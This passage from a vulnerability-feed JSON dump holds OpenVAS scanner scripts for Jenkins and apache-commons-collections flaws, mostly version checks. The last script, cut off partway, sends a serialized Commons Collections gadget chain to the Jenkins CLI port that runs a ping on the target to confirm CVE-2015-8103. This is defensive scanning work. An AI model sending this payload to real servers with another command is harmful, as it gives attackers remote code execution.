on the affected system.\");\n\n script_tag(name:\"affected\", value:\"All Jenkins main line releases up to and including 1.637,\n all Jenkins LTS releases up to and including 1.625.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.638,\n Jenkins LTS users should update to 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n 
script_dependencies(\"gb_jenkins_consolidation.nasl\");\n script_mandatory_keys(\"jenkins/detected\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:26:08", "bulletinFamily": "scanner", "description": "This host is installed with\n Jenkins and is prone to multiple vulnerabilities.", "modified": "2019-10-17T00:00:00", "published": "2015-12-15T00:00:00", "id": "OPENVAS:1361412562310807001", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807001", "title": "Jenkins Multiple Vulnerabilities - Nov15 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins Multiple Vulnerabilities - Nov15 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807001\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-12-15 17:52:00 +0530 (Tue, 15 Dec 2015)\");\n\n script_name(\"Jenkins Multiple Vulnerabilities - Nov15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in while requesting 
jnlpJars.\n\n - An improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"All Jenkins main line releases up to and including 1.637,\n all Jenkins LTS releases up to and including 1.625.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.638,\n Jenkins LTS users should update to 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(get_kb_item(\"jenkins/\" + port + \"/is_lts\")) {\n if(version_is_less(version:version, 
test_version:\"1.625.2\")) {\n vuln = TRUE;\n fix = \"1.625.2\";\n }\n} else {\n if(version_is_less(version:version, test_version:\"1.638\")) {\n vuln = TRUE;\n fix = \"1.638\";\n }\n}\n\nif(vuln) {\n report = report_fixed_ver(installed_version:version, fixed_version:fix, install_path:location);\n security_message(port:port, data:report, proto:proto);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the 'jenkins' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2015-12-23T00:00:00", "id": "OPENVAS:1361412562310806920", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806920", "title": "Fedora Update for jenkins FEDORA-2015-89468612", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins FEDORA-2015-89468612\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806920\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-23 05:38:34 +0100 (Wed, 23 Dec 2015)\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5319\", \"CVE-2015-5324\", \"CVE-2015-5321\",\n \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5326\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins FEDORA-2015-89468612\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-89468612\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-December/174273.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n if ((res = isrpmvuln(pkg:\"jenkins\", rpm:\"jenkins~1.609.3~4.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "scanner", "description": "Mageia Linux Local Security Checks mgasa-2016-0137", "modified": "2019-03-14T00:00:00", "published": "2016-05-09T00:00:00", "id": "OPENVAS:1361412562310131309", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131309", "title": "Mageia Linux Local Check: mgasa-2016-0137", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0137.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131309\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:18:11 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0137\");\n script_tag(name:\"insight\", value:\"Updated apache-commons-collections packages fix security vulnerability: Due to an issue with serialization, Java applications can be vulnerable to malicious remote code execution when the apache-commons-collections library is on the classpath (CVE-2015-8103).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0137.html\");\n script_cve_id(\"CVE-2015-8103\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0137\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.2~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:25:51", "bulletinFamily": "scanner", "description": "Jenkins is prone to a remote code-execution vulnerability.", "modified": "2019-10-17T00:00:00", "published": "2016-07-22T00:00:00", "id": "OPENVAS:1361412562310105820", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105820", "title": "Jenkins CLI RMI Java Deserialization Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins CLI RMI Java Deserialization Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105820\");\n script_bugtraq_id(77636);\n script_cve_id(\"CVE-2015-8103\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-10-17T11:27:19+0000\");\n\n script_name(\"Jenkins CLI RMI Java Deserialization Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/77636\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2015/q4/241\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a serialized object which executes a ping against the scanner.\");\n\n script_tag(name:\"insight\", value:\"Unsafe deserialization allows unauthenticated remote attackers to run arbitrary code on the Jenkins master.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. 
Please see the references or vendor advisory for more information.\");\n\n script_tag(name:\"summary\", value:\"Jenkins is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Jenkins main line before 1.638, Jenkins LTS before 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-22 12:45:35 +0200 (Fri, 22 Jul 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/jenkins_cli\", 50000);\n script_mandatory_keys(\"jenkins/detected\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"dump.inc\");\n\nport = get_kb_item( \"Services/jenkins_cli\" );\nif( ! port )\n port = 50000;\n\nif( ! get_port_state( port ) )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\nheaders = raw_string( 0x00,0x14,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x3a,0x43,0x4c,0x49,0x2d,0x63,0x6f,0x6e,0x6e,0x65,0x63,0x74 );\nsend( socket:soc, data:headers );\nrecv = recv( socket:soc, length:512 );\n\nif( ! 
recv || \"JENKINS\" >!< recv ) {\n close( soc );\n exit( 0 );\n}\n\n# Used to confirm the vulnerability\nvtstrings = get_vt_strings();\nvtcheck = vtstrings[\"ping_string\"];\n\npayload = raw_string( 0x3c,0x3d,0x3d,0x3d,0x5b,0x4a,0x45,0x4e,0x4b,0x49,0x4e,0x53,0x20,0x52,0x45,0x4d,0x4f,0x54,0x49,0x4e,0x47,0x20,0x43,0x41,0x50,0x41,0x43,0x49,0x54,0x59,0x5d,0x3d,0x3d,0x3d,0x3e );\n\nex += raw_string(\n0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x73,0x75,0x6e,0x2e,0x72,0x65,0x66,0x6c,\n0x65,0x63,0x74,0x2e,0x61,0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x41,\n0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,\n0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x55,0xca,0xf5,0x0f,0x15,0xcb,\n0x7e,0xa5,0x02,0x00,0x02,0x4c,0x00,0x0c,0x6d,0x65,0x6d,0x62,0x65,0x72,0x56,0x61,\n0x6c,0x75,0x65,0x73,0x74,0x00,0x0f,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,\n0x6c,0x2f,0x4d,0x61,0x70,0x3b,0x4c,0x00,0x04,0x74,0x79,0x70,0x65,0x74,0x00,0x11,\n0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,\n0x3b,0x78,0x70,0x73,0x7d,0x00,0x00,0x00,0x01,0x00,0x0d,0x6a,0x61,0x76,0x61,0x2e,\n0x75,0x74,0x69,0x6c,0x2e,0x4d,0x61,0x70,0x78,0x72,0x00,0x17,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2e,0x50,0x72,\n0x6f,0x78,0x79,0xe1,0x27,0xda,0x20,0xcc,0x10,0x43,0xcb,0x02,0x00,0x01,0x4c,0x00,\n0x01,0x68,0x74,0x00,0x25,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,\n0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2f,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,\n0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x3b,0x78,0x70,0x73,0x71,0x00,0x7e,\n0x00,0x00,0x73,0x72,0x00,0x2a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x6d,0x61,0x70,0x2e,0x4c,0x61,0x7a,0x79,0x4d,0x61,0x70,\n0x6e,0xe5,0x94,0x82,0x9e,0x79,0x10,0x94,0x03,0x00,0x01,0x4c,0x00,0x07,0x66,0x61,\n0x63,0x74,0x6f,0x72,0x79,0x74,0x00,0x2c,0x4
c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,\n0x63,0x68,0x65,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,\n0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,\n0x6d,0x65,0x72,0x3b,0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,\n0x61,0x63,0x68,0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,\n0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,\n0x73,0x2e,0x43,0x68,0x61,0x69,0x6e,0x65,0x64,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,\n0x72,0x6d,0x65,0x72,0x30,0xc7,0x97,0xec,0x28,0x7a,0x97,0x04,0x02,0x00,0x01,0x5b,\n0x00,0x0d,0x69,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x73,0x74,\n0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,0x63,0x68,0x65,0x2f,0x63,\n0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,\n0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,\n0x72,0x3b,0xbd,0x56,0x2a,0xf1,0xd8,0x34,0x18,0x99,0x02,0x00,0x00,0x78,0x70,0x00,\n0x00,0x00,0x05,0x73,0x72,0x00,0x3b,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x43,\n0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,\n0x65,0x72,0x58,0x76,0x90,0x11,0x41,0x02,0xb1,0x94,0x02,0x00,0x01,0x4c,0x00,0x09,\n0x69,0x43,0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,\n0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x78,0x70,\n0x76,0x72,0x00,0x11,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x52,0x75,\n0x6e,0x74,0x69,0x6d,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,\n0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x49,0x6e,\n0x76,0x6f,0x6b,0x65,0x72,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,\n0x87,0xe8,0xff,0x6b,0x7b,0x7c,0xce,0x38,0x02,0x00,0x03,0x5b,0x00,0x05,0x69,0x41,\n0x72,0x67,0x73,0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,\n0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0b,0x69,0x4d,0x65,0x74,\n0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,\n0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x0b,0x69,\n0x50,0x61,0x72,0x61,0x6d,0x54,0x79,0x70,0x65,0x73,0x74,0x00,0x12,0x5b,0x4c,0x6a,\n0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x02,0x74,0x00,0x0a,0x67,0x65,0x74,0x52,\n0x75,0x6e,0x74,0x69,0x6d,0x65,0x75,0x72,0x00,0x12,0x5b,0x4c,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x43,0x6c,0x61,0x73,0x73,0x3b,0xab,0x16,0xd7,0xae,\n0xcb,0xcd,0x5a,0x99,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x00,0x74,0x00,0x09,\n0x67,0x65,0x74,0x4d,0x65,0x74,0x68,0x6f,0x64,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,\n0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0xa0,0xf0,0xa4,0x38,0x7a,0x3b,0xb3,0x42,0x02,\n0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1e,0x73,0x71,0x00,0x7e,0x00,0x16,\n0x75,0x71,0x00,0x7e,0x00,0x1b,0x00,0x00,0x00,0x02,0x70,0x75,0x71,0x00,0x7e,0x00,\n0x1b,0x00,0x00,0x00,0x00,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x75,0x71,\n0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,
0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1b,0x73,\n0x71,0x00,0x7e,0x00,0x16,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,\n0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,\n0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00);\n\nif( host_runs(\"Windows\") == \"yes\" )\n{\n cmd = 'ping -c 5 ' + this_host();\n win = TRUE;\n}\nelse\n cmd = 'ping -c 5 -p ' + hexstr(vtcheck) + ' ' + this_host();\n\nlen = raw_string( strlen( cmd ) );\n\nex += len + cmd + raw_string(\n0x74,0x00,0x04,0x65,0x78,0x65,0x63,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,\n0x01,0x71,0x00,0x7e,0x00,0x23,0x73,0x71,0x00,0x7e,0x00,0x11,0x73,0x72,0x00,0x11,\n0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,\n0x72,0x12,0xe2,0xa0,0xa4,0xf7,0x81,0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,\n0x61,0x6c,0x75,0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,\n0x67,0x2e,0x4e,0x75,0x6d,0x62,0x65,0x72,0x86,0xac,0x95,0x1d,0x0b,0x94,0xe0,0x8b,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,\n0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x48,0x61,0x73,0x68,0x4d,0x61,0x70,0x05,0x07,\n0xda,0xc1,0xc3,0x16,0x60,0xd1,0x03,0x00,0x02,0x46,0x00,0x0a,0x6c,0x6f,0x61,0x64,\n0x46,0x61,0x63,0x74,0x6f,0x72,0x49,0x00,0x09,0x74,0x68,0x72,0x65,0x73,0x68,0x6f,\n0x6c